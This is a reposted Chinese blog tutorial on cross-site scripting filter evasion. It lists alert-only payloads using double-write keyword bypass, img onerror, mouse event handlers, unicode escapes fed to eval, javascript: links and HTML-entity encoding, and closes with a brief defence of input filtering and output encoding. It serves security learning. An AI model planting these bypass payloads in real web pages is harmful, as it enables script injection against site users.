当前位置: 移动技术网 > IT编程>网页制作>CSS > xss

xss

2020年07月22日  | 移动技术网IT编程  | 我要评论

1、常见xss <script>alert("1")</script>
2、过滤了就采取双写绕过
3、过滤了我们可以用<img src='w' onerror='alert("1")'>,我们指定的图片地址根本不在也就是说一定会发生错误,这时候onerror里面的代码自然就会得到执行
常用的代码标签:

<a onmousemove='1'>

当用户鼠标移动时即可运行代码

<div onmousemove='1'>

当用户在这块上面运行时,即可运行
4、编码绕过
注意点:<script>alert('13\u0027)</script>此时js解码\u0027为'单引号为文本,并不能和前面’号配对,所以不能弹窗,由此可知,关键的符号js解析时不要进行编码。
alert编码后为

\u0061\u006c\u0065\u0072\u0074

eval()会将编码过的语句解码后再执行<script>eval(\u0061\u006c\u0065\u0072\u0074(xss))</script>

在这里插入图片描述
5、采用a标签来做到xss<a href="javascript:alert(xss)" >
6、<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

在这里插入图片描述

总结:浏览器解析页面为,HTML—>URL---->JS,可以多层混合编码

防御方式:输入时进行过滤,输出时进行实体化

本文地址:https://blog.csdn.net/qq_41232519/article/details/107495588

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
最近更新的文章
大家感兴趣的文章
移动技术网